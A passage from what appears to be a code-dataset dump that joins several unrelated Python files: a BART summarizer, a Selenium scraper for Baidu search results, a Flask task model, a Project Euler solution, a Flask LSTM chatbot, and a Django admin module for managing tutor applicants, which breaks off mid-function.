model_name_or_path = \"../data/models/SciTLDR/\"\n data_name_or_path = \"./SciTLDR-Data/SciTLDR-A/ctrl\"\n\n bart = BARTModel.from_pretrained(\n model_name_or_path = model_name_or_path,\n data_name_or_path = data_name_or_path + '-bin',\n ).to(torch_device)\n\n summary_txt = bart.sample(texts, beam=num_beams, lenpen=length_penalty, max_len_b=max_length, min_len=min_length, no_repeat_ngram_size=no_repeat_ngram_size)\n return summary_txt","repo_name":"Muelli21/RecommendingPapers","sub_path":"src/utils/summarizing.py","file_name":"summarizing.py","file_ext":"py","file_size_in_byte":3462,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"11471997461","text":"# -*- coding: utf-8 -*-\n\nimport datetime3 as datetime # 用于获取当前日期作为默认日期\nimport time # 用于获取unix时间作为url中的参数,用于睡觉\nfrom lxml import etree\nfrom indentation import indent # 字符串缩进\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\n\n\nclass baidusearcher():\n # 根本参数\n driver = None # webdriver.Chrome()\n\n # 搜索参数\n searchKeyword = None\n searchBaseUrl = 'https://www.baidu.com/s' +\\\n '?ie=utf-8' +\\\n '&tn=monline_4_dg' +\\\n '&ct=2097152' +\\\n '&rqlang=cn'\n searchEngine = 'baidu.com'\n searchSourceWebsite = None # 限定来源网站\n searchHowManyResultsOnePage = 10 # 设置每页显示多少结果\n searchStartTime = None # None表示没设置时间限制\n searchEndTime = None # None表示没设置时间限制\n resultWanted = None\n searchPageProcess = None\n resultPageProcess = None\n\n # 运行参数\n searchUrlInput = None # 生成的searchUrl\n searchUrlOutput = None # 访问searchUrlInput并经过自动跳转后的真实searchUrl\n searchIndex = -1 # 一次搜索返回多个搜索页(search),这是搜索页索引,从0开始。\n searchHtml = None\n searchRoot = None\n searchTitle = None\n resultIndex = -1 # 一次搜索返回多条返回结果(result),这是结果的总(跨页)索引,从0开始。\n resultIndexInPage = None # 一个搜索页中有多条返回结果(result),这是结果的页内索引,从0开始。\n resultXPathPattern = lambda x: '//*[@id=\\\"' + str(x + 1) + '\\\"]' # 生成resultXPath的模板\n resultXPath = None # 从searchRoot到页内第x个resultElement的xpath\n resultElement = None # result块\n resultAXPath = 'h3/a' # 从resultElement到searchUrlInput的xpath\n resultUrlInput = None\n resultUrlOutput = None\n resultTitle = None\n resultText = None\n resultTime = None\n resultSaved = 0 # 不是每个结果都符合要求,这是已经处理了的符合要求的reasult的个数。\n\n @staticmethod\n def initDriver():\n # 创建options\n options = Options()\n # options添加启动参数\n options.add_argument('--headless') # 无头模式(不展示界面)\n options.add_argument('log-level=3') # INFO = 0 WARNING = 1 LOG_ERROR = 2 LOG_FATAL = 3 default is 0\n # options添加试验选项\n prefs = {\n \"profile.managed_default_content_settings.images\": 2, # 禁用图片\n 'profile.default_content_setting_values': {'notifications': 2} # 禁用弹窗\n }\n options.add_experimental_option(\"prefs\", prefs)\n # 创建driver\n baidusearcher.driver = webdriver.Chrome(\n options=options,\n executable_path='D:/ProgramFiles/chromedriver/chromedriver.exe'\n )\n\n @staticmethod\n def closeDriver():\n # baidusearcher.driver.close() # 关闭当前窗口,如果是当前打开的最后一个窗口,则退出浏览器(driver)\n baidusearcher.driver.quit() # 关闭所有相关的窗口,退出浏览器(driver)\n\n @staticmethod\n def initSearcher(\n keyword,\n startY=None, startM=None, startD=None, startH=None, startMi=None, startS=None,\n endY=None, endM=None, endD=None, endH=None, endMi=None, endS=None,\n howManyResultWanted=5,\n sourceWebsite=None,\n fiddler=None,\n searchPageProcess = None,\n resultPageProcess = None\n ):\n # 传参:要多少result\n baidusearcher.resultWanted = howManyResultWanted\n # 传参:关键字\n baidusearcher.searchKeyword = keyword\n # 传参:限制来源网页\n if sourceWebsite is not None:\n baidusearcher.searchSourceWebsite = sourceWebsite\n # 传参:限制开始时间\n now = datetime.datetime.now()\n ifStartTimeSeted = (startY or startM or startD or startH or startMi or startS) is not None\n ifEndTimeSeted = (endY or endM or endD or endH or endMi or endS) is not None\n if ifStartTimeSeted is True:\n startY = startY if startY is not None else now.year\n startM = startM if startY is not None else now.month\n startD = startD if startY is not None else now.day\n 'startH = startH if startY is not None else today.day'\n 'startMi = startMi if startY is not None else today.day'\n 'startS = startS if startY is not None else today.day'\n baidusearcher.searchStartTime = datetime.datetime(startY, startM, startD, 0, 0, 0)\n # 传参:限制结束时间\n if ifEndTimeSeted is True:\n endY = endY if endY is not None else now.year\n endM = endM if endY is not None else now.month\n endD = endD if endY is not None else now.day\n 'endH = endH if endY is not None else today.day'\n 'endMi = endMi if endY is not None else today.day'\n 'endS = endS if endY is not None else today.day'\n baidusearcher.searchEndTime = datetime.datetime(endY, endM, endD, 23, 59, 59)\n else:\n if ifStartTimeSeted is True:\n # 当开始时间设置了,即使结束时间没设置,也要默认设为当前时间\n baidusearcher.searchEndTime = now\n else:\n pass\n # 传参:搜索网址\n baidusearcher.searchUrlInput = baidusearcher.searchBaseUrl\n '''添加关键词'''\n baidusearcher.searchUrlInput += ('&wd=' + baidusearcher.searchKeyword)\n '''添加来源网站'''\n if baidusearcher.searchSourceWebsite is not None:\n baidusearcher.searchUrlInput += ('&si=' + baidusearcher.searchSourceWebsite)\n '''添加开始时间'''\n if baidusearcher.searchStartTime is not None:\n startTimeUnix = time.mktime(baidusearcher.searchStartTime.timetuple())\n startTimeUnix = str(int(startTimeUnix))\n baidusearcher.searchUrlInput += ('&gpc=stf=' + startTimeUnix)\n elif baidusearcher.searchEndTime is not None:\n baidusearcher.searchUrlInput += ('gpc=stf=' + '0')\n '''添加结束时间'''\n if baidusearcher.searchEndTime is not None:\n endTimeUnix = time.mktime(baidusearcher.searchEndTime.timetuple())\n endTimeUnix = str(int(endTimeUnix))\n baidusearcher.searchUrlInput += (',' + endTimeUnix)\n baidusearcher.searchUrlInput += '%7Cstftype%3D2&tfflag=1'\n '''添加每页结果数'''\n baidusearcher.searchUrlInput += ('&rn=' + str(baidusearcher.searchHowManyResultsOnePage))\n # 传参:处理函数\n baidusearcher.searchPageProcess = searchPageProcess\n baidusearcher.resultPageProcess = resultPageProcess\n\n @staticmethod\n def search():\n # 类变量���字太长,固定不变的类变量起个简短的别名\n rn = baidusearcher.searchHowManyResultsOnePage\n # 运行参数归零\n baidusearcher.searchIndex = -1\n baidusearcher.resultIndex = -1\n baidusearcher.resultIndexInPage = None\n baidusearcher.resultSaved = 0\n # 遍历每个返回结果\n while baidusearcher.resultSaved <= baidusearcher.resultWanted:\n # 遍历下一个result\n baidusearcher.resultIndex += 1\n # 确认页数\n ifNextPage = baidusearcher.searchIndex != (baidusearcher.resultIndex // rn)\n baidusearcher.searchIndex = baidusearcher.resultIndex // rn\n baidusearcher.resultIndexInPage = baidusearcher.resultIndex % rn\n # 是否翻页\n if ifNextPage:\n baidusearcher.searchUrlInput += ('&pn=' + str(baidusearcher.searchIndex*rn))\n print(\n indent(\n '第'+str(baidusearcher.searchIndex)+'页'+baidusearcher.searchUrlInput,\n length=100, fIndent=2, lIndent=2\n )\n )\n # 访问\n baidusearcher.driver.get(baidusearcher.searchUrlInput)\n # 获取信息\n baidusearcher.searchHtml = baidusearcher.driver.page_source\n baidusearcher.searchTitle = baidusearcher.driver.title\n baidusearcher.searchUrlOutput = baidusearcher.driver.current_url\n baidusearcher.searchRoot = etree.HTML(baidusearcher.searchHtml)\n # 处理搜索页\n baidusearcher.searchPageProcess()\n # 定位result\n baidusearcher.resultXPath = baidusearcher.resultXPathPattern(baidusearcher.resultIndexInPage)\n baidusearcher.resultElement = baidusearcher.searchRoot.xpath('.'+baidusearcher.resultXPath)\n # 如果result定位失败,则跳过此次循环\n if baidusearcher.resultElement == []:\n print(' 没有更多的结果了')\n return 0\n else:\n baidusearcher.resultElement = baidusearcher.resultElement[0]\n # 定位resultUrl\n baidusearcher.resultUrlInput = baidusearcher.resultElement.xpath('./'+baidusearcher.resultAXPath+'/@href')\n # 如果结果url定位失败则跳过此次循环\n if baidusearcher.resultUrlInput == []:\n print(\n indent(\n '第%d(%dp%d)个结果,因如下原因落选:%s' % (\n baidusearcher.resultIndex,\n baidusearcher.searchIndex,\n baidusearcher.resultIndexInPage,\n '未找到网址'\n ),\n length=100, fIndent=4, lIndent=4\n )\n )\n continue\n else:\n baidusearcher.resultUrlInput = baidusearcher.resultUrlInput[0]\n # 处理resultPage\n resultProcessReturn = baidusearcher.resultPageProcess()\n # 判断结果是否合格\n if resultProcessReturn[0]:\n baidusearcher.resultSaved += 1\n print(\n indent(\n '第%d(%dp%d)个结果入选为第%d个正确结果: ' % (\n baidusearcher.resultIndex,\n baidusearcher.searchIndex,\n baidusearcher.resultIndexInPage,\n baidusearcher.resultSaved\n ),\n length=100, fIndent=4, lIndent=4\n )\n )\n else:\n print(\n indent(\n '第%d(%dp%d)个结果,因如下原因落选:%s' % (\n baidusearcher.resultIndex,\n baidusearcher.searchIndex,\n baidusearcher.resultIndexInPage,\n resultProcessReturn[1]\n ),\n length=100, fIndent=4, lIndent=4\n )\n )\n","repo_name":"Zhuo-Ren/baiduXinhuaNewsSpider","sub_path":"baidusearcher.py","file_name":"baidusearcher.py","file_ext":"py","file_size_in_byte":11110,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"} +{"seq_id":"41023180574","text":"from flask import current_app\nfrom app import db\nfrom app.models.goal import Goal\n\n\nclass Task(db.Model):\n task_id = db.Column(db.Integer, primary_key=True, autoincrement = True, nullable=False)\n title = db.Column(db.String(64), nullable=False)\n description = db.Column(db.String(64), nullable=False)\n completed_at = db.Column(db.DateTime, nullable=True)\n goal_id = db.Column(db.Integer, db.ForeignKey('goal.goal_id'), nullable=True)\n\n\n def to_dict(self):\n\n if self.goal_id == None:\n task_dict = {\n\n \"id\": self.task_id,\n \"title\": self.title,\n \"description\": self.description,\n \"is_complete\": self.completed_at is not None,\n\n }\n\n else:\n task_dict = {\n \n \"id\": self.task_id,\n \"goal_id\": self.goal_id,\n \"title\": self.title,\n \"description\": self.description,\n \"is_complete\": self.completed_at is not None,\n\n\n }\n\n return task_dict\n ","repo_name":"heysierra/task-list-api","sub_path":"app/models/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"2869867042","text":"from mylib import sqrt\n\n\ndef sigma2(n):\n sieveLimit = sqrt(n)\n spf = [2 if i % 2 == 0 else i for i in range(n + 1)]\n for i in range(3, sieveLimit + 1, 2):\n if spf[i] == i:\n for m in range(i * i, n + 1, 2 * i):\n if spf[m] == m:\n spf[m] = i\n\n res = 1\n sigma = [0] * (n + 1)\n sigma[1] = 1\n for i in range(2, n + 1):\n p = spf[i]\n q = 1\n factor = 1\n m = i\n while m % p == 0:\n m //= p\n q *= p**2\n factor += q\n sigma[i] = factor * sigma[m]\n if sqrt(sigma[i])**2 == sigma[i]:\n res += i\n\n return res\n\n\nprint(sigma2(64000000))\n","repo_name":"smsxgz/euler_project","sub_path":"problems/problem_211/Divisor_Square_Sum.py","file_name":"Divisor_Square_Sum.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22063624884","text":"from flask import Flask, render_template, request\nimport json\nimport nltk\nfrom nltk.stem import WordNetLemmatizer\nfrom sklearn.preprocessing import LabelEncoder\nfrom tensorflow.keras.preprocessing.text import Tokenizer\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.layers import Input, Embedding, LSTM, Flatten, Dense\nimport numpy as np\nimport pandas as pd\nimport string\nimport random\n\napp = Flask(__name__)\n\n# Variabel global\nwords, classes, tokenizer = [], [], None\n\ndef preprocess_data():\n global words, classes, tokenizer\n # Importing the dataset\n with open('kampus_merdeka.json') as content:\n data1 = json.load(content)\n\n tags = [] # data tag\n inputs = [] # data input atau pattern\n responses = {} # data respon\n ignore_words = ['?', '!'] # Mengabaikan tanda spesial karakter\n\n # Tambahkan data intents dalam json\n for intent in data1['intents']:\n responses[intent['tag']] = intent['responses']\n for lines in intent['patterns']:\n inputs.append(lines)\n tags.append(intent['tag'])\n # digunakan untuk pattern atau teks pertanyaan dalam json\n for pattern in intent['patterns']:\n w = nltk.word_tokenize(pattern)\n words.extend(w)\n # tambahkan ke dalam list kelas dalam data\n if intent['tag'] not in classes:\n classes.append(intent['tag'])\n\n # Konversi data json ke dalam dataframe\n data = pd.DataFrame({\"patterns\": inputs, \"tags\": tags})\n\n # Removing Punctuations (Menghilangkan Punktuasi)\n data['patterns'] = data['patterns'].apply(lambda wrd: [ltrs.lower() for ltrs in wrd if ltrs not in string.punctuation])\n data['patterns'] = data['patterns'].apply(lambda wrd: ''.join(wrd))\n\n lemmatizer = WordNetLemmatizer()\n words = [lemmatizer.lemmatize(w.lower()) for w in words if w not in ignore_words]\n words = sorted(list(set(words)))\n\n # sorting pada data class\n classes = sorted(list(set(classes)))\n\n # Tokenize the data (Tokenisasi Data)\n tokenizer = Tokenizer(num_words=2000)\n tokenizer.fit_on_texts(data['patterns'])\n train = tokenizer.texts_to_sequences(data['patterns'])\n\n # Melakukan proses padding pada data\n x_train = pad_sequences(train)\n\n # Melakukan konversi data label tags dengan encoding\n le = LabelEncoder()\n y_train = le.fit_transform(data['tags'])\n\n # Melihat hasil input pada data teks\n input_shape = x_train.shape[1]\n\n return x_train, y_train, input_shape, le, responses\n\ndef create_model(input_shape, vocabulary, output_length):\n # Creating the model (Membuat Modelling)\n i = Input(shape=(input_shape,)) # Layer Input\n x = Embedding(vocabulary + 1, 10)(i) # Layer Embedding\n x = LSTM(10, return_sequences=True, recurrent_dropout=0.2)(x) # Layer Long Short Term Memory\n x = Flatten()(x) # Layer Flatten\n x = Dense(output_length, activation=\"softmax\")(x) # Layer Dense\n model = Model(i, x) # Model yang telah disusun dari layer Input sampai layer Output\n\n # Compiling the model (Kompilasi Model)\n model.compile(loss=\"sparse_categorical_crossentropy\", optimizer='adam', metrics=['accuracy'])\n\n return model\n\n@app.route('/')\ndef home():\n return render_template('index.html')\n\n@app.route('/predict', methods=['POST'])\ndef predict():\n global words, classes, tokenizer\n if request.method == 'POST':\n prediction_input = request.form['user_input']\n\n x_train, y_train, input_shape, le, responses = preprocess_data()\n model = create_model(input_shape, len(words), len(classes))\n \n output = model.predict(pad_sequences(tokenizer.texts_to_sequences([prediction_input]), maxlen=input_shape))\n output = output.argmax()\n\n response_tag = le.inverse_transform([output])[0]\n bot_response = random.choice(responses[response_tag])\n\n return render_template('index.html', user_input=prediction_input, bot_response=bot_response)\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"SriYanisaa/chatbot-kampus-merdeka-deep-learning","sub_path":"arsip_app.py","file_name":"arsip_app.py","file_ext":"py","file_size_in_byte":4108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"7062993223","text":"from compat import reverse\nfrom django.contrib import admin\nfrom django.http import HttpRequest\nfrom simplejson import OrderedDict\nfrom tutor_management.models import (\n NewTutorApplicant,\n Reference,\n TutorApplicantTrack,\n TutorRevamp,\n VerifiedTutor,\n TutorSkill,\n Skill,\n QuizSitting,\n VerifiedTutorWithSkill,\n)\nfrom .forms import GuarantorForm\nfrom django.db import models\nfrom django.utils import timesince\nfrom django.utils.html import escapejs\nfrom django.contrib.admin.helpers import ActionForm\nfrom django import forms\nfrom config.utils import streaming_response\nfrom django.contrib import messages\nfrom users.models import UserProfile, Location\nfrom registration.admin import (\n VerifiedTutorAdmin as RVerifiedTutorAdmin,\n VerifiedTutorSkillsAdmin as RVerifiedTutorSkillsAdmin,\n TutorRevampAdmin as RTutorRevampAdmin,\n)\nfrom skills.admin import (\n TutorSkillAdmin as RTutorSkillAdmin,\n QuizSittingAdmin as RQuizSittingAdmin,\n SkillAdmin as RSkillAdmin,\n)\n\n# Register your models here.\n\nimport json\n\n\nclass WithRemark(admin.SimpleListFilter):\n title = \"With remark\"\n parameter_name = \"with_remark\"\n\n def lookups(self, request, model_admin):\n return ((\"with_remark\", \"with_remark\"),)\n\n def queryset(self, request, queryset):\n if self.value():\n new_queryset = queryset.filter(\n data_dump__tutor_update__admin_remarks__0__isnull=False\n )\n return new_queryset\n return queryset\n\n\nclass StateFilter(admin.SimpleListFilter):\n title = \"State\"\n parameter_name = \"state\"\n\n def lookups(self, request, model_admin):\n return Location.NIGERIAN_STATES\n\n def queryset(self, request, queryset):\n if self.value():\n return queryset.filter(\n data_dump__tutor_update__personalInfo__state__icontains=self.value()\n )\n return queryset\n\n\nclass CurrentStepFilter(admin.SimpleListFilter):\n title = \"Current Step\"\n parameter_name = \"current_step\"\n APPLY = \"apply\"\n VERIFY = \"verify\"\n SUBJECTS = \"subjects\"\n COMPLETE = \"complete\"\n PREFERENCES = \"preferences\"\n TERMS = \"terms\"\n VERIFIED_TUTOR = \"application-verified\"\n\n def lookups(self, request, model_admin):\n return (\n (self.APPLY, f\"{self.APPLY} (Step 1)\"),\n (self.SUBJECTS, f\"{self.SUBJECTS} (Step 2)\"),\n (self.VERIFY, f\"{self.VERIFY} (Step 3)\"),\n (self.COMPLETE, f\"{self.COMPLETE} (Step 4)\"),\n (self.PREFERENCES, f\"{self.PREFERENCES} (Step 5)\"),\n (self.TERMS, f\"{self.TERMS} (Step 6)\"),\n (self.VERIFIED_TUTOR, f\"{self.VERIFIED_TUTOR} (Step 7)\"),\n )\n\n def queryset(self, request, queryset):\n if self.value():\n return queryset.by_current_step(self.value())\n return queryset\n\n\nclass GuarantorsApprovedFilter(admin.SimpleListFilter):\n title = \"Guarantors\"\n parameter_name = \"guarantors\"\n\n def lookups(self, request, model_admin):\n return (\n (\"approved\", \"Approved\"),\n (\"pending\", \"Pending\"),\n (\"missing\", \"Missing Gurantors\"),\n )\n\n def queryset(self, reuqest, queryset):\n if self.value() == \"approved\":\n return queryset.filter(data_dump__tutor_update__guarantors_verified=True)\n if self.value() == \"pending\":\n condition_1 = models.Q(\n data_dump__tutor_update__guarantors_verified__isnull=True\n )\n condition_2 = models.Q(\n data_dump__tutor_update__educationWorkHistory__guarantors__0__isnull=False\n )\n return queryset.filter(condition_1 & condition_2)\n if self.value() == \"missing\":\n condition_1 = models.Q(\n data_dump__tutor_update__educationWorkHistory__guarantors__0__isnull=True\n )\n condition_2 = mdoels.Q(\n data_dump__tutor_update__educationWorkHistory__guarantors__isnull=True\n )\n return queryset.filter(condition_1 | condition_2)\n return queryset\n\n\nclass VideoSummaryApprovedFilter(admin.SimpleListFilter):\n title = \"Video Submission\"\n parameter_name = \"video\"\n\n def lookups(self, request, model_admin):\n return (\n (\"approved\", \"Approved\"),\n (\"pending\", \"Pending\"),\n (\"missing\", \"Missing Video\"),\n )\n\n def queryset(self, request, queryset):\n if self.value() == \"approved\":\n return queryset.filter(data_dump__tutor_update__others__videoVerified=True)\n if self.value() == \"pending\":\n condition_1 = models.Q(data_dump__tutor_update__others__videoVerified=False)\n condition_2 = models.Q(\n data_dump__tutor_update__others__videoVerified__isnull=True\n )\n return queryset.filter(\n data_dump__tutor_update__others__videoSummary__url__startswith=\"http\"\n ).filter(condition_2 | condition_1)\n\n if self.value() == \"missing\":\n condition_1 = models.Q(\n data_dump__tutor_update__others__videoSummary__isnull=True\n )\n condition_2 = models.Q(\n data_dump__tutor_update__others__videoSummary__url=\"\"\n )\n return queryset.filter(condition_1 | condition_2)\n return queryset\n\n\nclass IdentityApprovedFilter(admin.SimpleListFilter):\n title = \"Identity\"\n parameter_name = \"identity\"\n\n def lookups(self, request, model_admin):\n return (\n (\"approved\", \"Approved\"),\n (\"pending\", \"Pending\"),\n (\"missing\", \"Missing identity\"),\n )\n\n def queryset(self, request, queryset):\n if self.value() == \"approved\":\n return queryset.filter(data_dump__tutor_update__identity__isIdVerified=True)\n if self.value() == \"pending\":\n return queryset.filter(\n data_dump__tutor_update__identity__uploadStore__files__0__isnull=False\n ).exclude(data_dump__tutor_update__identity__isIdVerified=True)\n if self.value() == \"missing\":\n condition_1 = models.Q(\n data_dump__tutor_update__identity__uploadStore__files__0__isnull=True\n )\n condition_2 = models.Q(\n data_dump__tutor_update__identity__uploadStore__isnull=True\n )\n return queryset.filter(condition_1 | condition_2)\n return queryset\n\n\nclass GenderFilter(admin.SimpleListFilter):\n title = \"Gender\"\n parameter_name = \"gender\"\n\n def lookups(self, request, model_admin):\n return [(x, x) for x in [\"male\", \"female\"]]\n\n def queryset(self, request, queryset):\n if self.value():\n return queryset.filter(\n data_dump__tutor_update__personalInfo__gender=self.value()\n )\n return queryset\n\n\nclass ApplicationStatusFilter(admin.SimpleListFilter):\n title = \"Application status\"\n parameter_name = \"application_status\"\n\n def lookups(self, request, model_admin):\n return [\n (x, x)\n for x in [\n \"verified\",\n \"verified_complete\",\n \"verified_not_complete\",\n \"denied\",\n \"frozen\",\n \"not_approved\",\n ]\n ]\n\n def queryset(self, request, queryset):\n if self.value() == \"verified\":\n return queryset.filter(\n profile__application_status=UserProfile.VERIFIED,\n data_dump__tutor_update__appData__currentStep=\"application-verified\",\n )\n if self.value() == \"verified_complete\":\n return queryset.filter(\n profile__application_status=UserProfile.VERIFIED,\n data_dump__tutor_update__appData__currentStep=\"complete\",\n )\n if self.value() == \"verified_not_complete\":\n return queryset.filter(\n profile__application_status=UserProfile.VERIFIED,\n data_dump__tutor_update__others__approved=True,\n data_dump__tutor_update__others__submission=True,\n ).exclude(\n data_dump__tutor_update__appData__currentStep=\"application-verified\"\n )\n if self.value() == \"denied\":\n return queryset.filter(\n profile__application_status=UserProfile.DENIED,\n data_dump__tutor_update__appData__currentStep=\"complete\",\n )\n if self.value() == \"frozen\":\n return queryset.filter(\n profile__application_status=UserProfile.FROZEN,\n data_dump__tutor_update__appData__currentStep=\"complete\",\n )\n if self.value() == \"not_approved\":\n return queryset.exclude(\n profile__application_status__in=[\n UserProfile.DENIED,\n UserProfile.VERIFIED,\n ]\n )\n return queryset\n\n\nclass UpdateStepForm(ActionForm):\n application_step = forms.ChoiceField(\n choices=[(\"\", \"Select\")]\n + [\n (x, x)\n for x in [\n \"personal-info\",\n \"location-info\",\n \"education-history\",\n \"work-history\",\n \"schedule-info\",\n \"teaching-profile\",\n \"payment-info\",\n \"new-development-info\",\n \"agreement-info\",\n \"verification-info\",\n \"guarantors-info\",\n \"verify-email\",\n \"video-summary\",\n \"subject-selection\",\n ]\n ],\n required=False,\n )\n current_step = forms.ChoiceField(\n choices=[(\"\", \"Select\")]\n + [\n (x, x)\n for x in [\n \"apply\",\n \"verify\",\n \"subjects\",\n \"complete\",\n \"preferences\",\n \"terms\",\n \"application-verified\",\n ]\n ],\n required=False,\n )\n\n\n@admin.register(TutorApplicantTrack)\nclass TutorApplicantTrackAdmin(admin.ModelAdmin):\n date_hierarchy = \"profile__date_approved\"\n main_fields = [\n \"the_email\",\n \"full_name\",\n \"dob\",\n \"gender\",\n \"phone\",\n \"location_country\",\n \"educations\",\n \"work_experiences\",\n \"profile_pic\",\n \"user_identity_info\",\n \"video_intro\",\n \"skills\",\n \"date_applied\",\n \"address\",\n \"references\",\n \"tutor_remarks\",\n \"current_step\",\n \"completed_steps\",\n ]\n search_fields = [\"email\"]\n list_display = main_fields + [\n \"delivery_method\",\n \"payment_info\",\n \"availability\",\n \"last_logged_in\",\n \"hijack_user\",\n ]\n list_filter = [\n CurrentStepFilter,\n GenderFilter,\n VideoSummaryApprovedFilter,\n IdentityApprovedFilter,\n ApplicationStatusFilter,\n WithRemark,\n ]\n change_list_template = \"admin/tutor_management/change_list2.html\"\n action_form = UpdateStepForm\n actions = [\n \"update_application_step\",\n \"update_application_step_without_email\",\n \"revert_approval_status\",\n \"re_approve_tutors\",\n \"export_as_csv\",\n \"freeze_tutor_profile\",\n \"update_approved_tutors_status\",\n \"update_not_approved_tutors_status\",\n \"update_current_step_for_existing_tutors\",\n \"sync_to_mailing_list\",\n \"update_profile_picture\"\n ]\n\n def update_profile_picture(self, request,queryset):\n for tutor in queryset.all():\n tutor.update_profile_picture()\n self.message_user(request, \"profile picture updated\")\n\n def get_actions(self, request: HttpRequest) -> OrderedDict:\n actions = super().get_actions(request)\n query_params = request.GET.get(\"application_status\")\n if query_params != \"verified_complete\":\n actions.pop(\"update_approved_tutors_status\")\n if query_params != \"not_approved\":\n actions.pop(\"update_not_approved_tutors_status\")\n if query_params != \"verified_not_complete\":\n actions.pop(\"update_current_step_for_existing_tutors\")\n return actions\n\n class Media:\n css = {\n \"screen\": (\n \"https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css\",\n \"admin/dist/bootstrap.min.css\",\n \"admin/dist/admin-modal-bootstrap-mod.css\",\n )\n }\n js = (\"admin/dist/bootstrap.min.js\",)\n\n def hijack_user(self, obj: TutorApplicantTrack):\n url = (\n '<a href=\"/hijack/%s\" target=\"_blank\">Hijack user</a>' % obj.pk\n + '<p><a href=\"%s\" target=\"_blank\">View tutor profile</a></p>'\n % obj.get_application_link\n )\n if obj.profile.application_status == UserProfile.VERIFIED:\n url += (\n '<p><a href=\"%s?redirect_url=/dashboard/\" target=\"_blank\">Main site</a></p>'\n % reverse(\"users:auth_existing_tutor\", args=[obj.pk, obj.slug])\n )\n return url\n\n hijack_user.allow_tags = True\n\n def last_logged_in(self, obj):\n if obj.last_visit:\n return timesince.timesince(obj.last_visit)\n\n last_logged_in.short_description = \"last logged in\"\n\n def completed_steps(self, obj: TutorApplicantTrack):\n steps = obj.determine_completed_steps()\n return \"<br/>\".join([x for x, v in steps.items() if v])\n\n completed_steps.allow_tags = True\n\n def full_name(self, obj: NewTutorApplicant):\n return obj.resolve_field([\"firstName\", \"lastName\"])\n\n def gender(self, obj: NewTutorApplicant):\n return obj.resolve_field(\"gender\")\n\n def address(self, obj):\n return obj.resolve_field([\"state\"])\n\n def phone(self, obj):\n return obj.resolve_field(\"phone\")\n\n def current_step(self, obj):\n return f\"<p>{obj.current_step}</p><p>{obj.application_step}</p>\"\n\n current_step.allow_tags = True\n\n def dob(self, obj):\n return obj.resolve_field(\"dateOfBirth\")\n\n def delivery_method(self, obj):\n return obj.availability.get(\"preferredLessonType\")\n\n def educations(self, obj: NewTutorApplicant):\n return \"<br/>\".join(\n [\n f\"<p><strong>{x.get('degree')}</strong> {x.get('course')}</p><p>{x.get('school')}</p><p>Start: {x.get('startYear')} End: {x.get('endYear')}</p>\"\n for x in obj.educations\n ]\n )\n\n educations.allow_tags = True\n\n def work_experiences(self, obj: NewTutorApplicant):\n return \"<br/>\".join(\n [\n f\"<p><strong>{x.get('role')}</strong></p><p>{x.get('company')}</p><p>Start: {x.get('startYear')}, End: {x.get('endYear')}</p><p>Teaching Role: {x.get('isTeachingRole')}</p>\"\n for x in obj.work_experiences\n ]\n )\n\n work_experiences.allow_tags = True\n\n def tutor_remarks(self, obj: NewTutorApplicant):\n remark = obj.tutor_remarks()\n return \"<br/>\".join(\n [\n f'<p style=\"margin-right: 20px;\">{x.get(\"action\")}-{x.get(\"remark\")}</p><p>{x.get(\"staff\")}</p><p>{x.get(\"created\")}</p>'\n for x in remark\n ]\n )\n\n tutor_remarks.allow_tags = True\n\n def references(self, obj):\n return (\n '<a href=\"/we-are-allowed/tutor_management/references/?q=%s\" target=\"_blank\">References</a>'\n % (obj.email,)\n )\n\n references.allow_tags = True\n\n def skills(self, obj: NewTutorApplicant):\n def with_link(o):\n if o.status == TutorSkill.ACTIVE:\n return f'<a target=\"_blank\" href=\"{o.get_absolute_url()}\"><strong>{o.skill.name}</strong></a>'\n if o.status == TutorSkill.PENDING:\n return f'<a target=\"_blank\" href=\"/we-are-allowed/tutor_management/tutorskill/?q={obj.email}\"><strong>{o.skill.name}</strong></a>'\n\n return f\"<strong>{o.skill.name}</strong>\"\n\n arr = \"<br/>\".join(\n [f\"{with_link(x)} ({x.get_status_display()})\" for x in obj.user_skills]\n )\n return arr\n\n skills.allow_tags = True\n\n def payment_info(self, obj):\n x = obj.payment_info\n if x:\n return f'<p>Bank: {x.get(\"bankName\")}</p><p>Name: {x.get(\"accountName\")}</p><p>Account Number: {x.get(\"accountNumber\")}</p><p>Tax id: {x.get(\"taxId\")}</p>'\n\n payment_info.allow_tags = True\n\n def date_applied(self, obj):\n return obj.date_joined\n\n def user_identity_info(self, obj):\n return obj.identity_pic()\n\n user_identity_info.allow_tags = True\n user_identity_info.short_description = \"Identity\"\n\n def video_intro(self, obj):\n video_summary = obj.others.get(\"videoSummary\")\n if video_summary:\n url = video_summary.get(\"url\")\n id = video_summary.get(\"id\")\n if url and id:\n return '<a href=\"{}\" target=\"_blank\">Video Summary</a>'.format(url)\n return \"\"\n\n video_intro.allow_tags = True\n video_intro.short_description = \"Video summary\"\n\n def references(self, obj: NewTutorApplicant):\n res = \"\"\n if obj.guarantors:\n for guarantor in obj.guarantors:\n res += \"\"\"\n <div>\n <p style=\"font-weight: 700;\">{title} {fullName}</p>\n <p>{occupation}, {company}</p>\n <p>{email}, {phone}</p>\n <hr />\n </div>\n \"\"\".format(\n **guarantor\n )\n return res\n\n references.allow_tags = True\n\n def update_application_step_without_email(self, request, queryset):\n current_step = request.POST.get(\"current_step\")\n application_step = request.POST.get(\"application_step\")\n if current_step or application_step:\n for tutor in queryset.all():\n tutor.notify_to_update_step(\n application_step, current_step, sendMail=False\n )\n tutor.add_remark_action(\n {\"action\": \"update_step\", \"remark\": \"\", \"staff\": request.user.email}\n )\n self.message_user(request, \"Notified tutors to update step\")\n else:\n self.message_user(\n request, \"Current step or application step missing\", messages.ERROR\n )\n\n # actions\n def update_application_step(self, request, queryset):\n current_step = request.POST.get(\"current_step\")\n application_step = 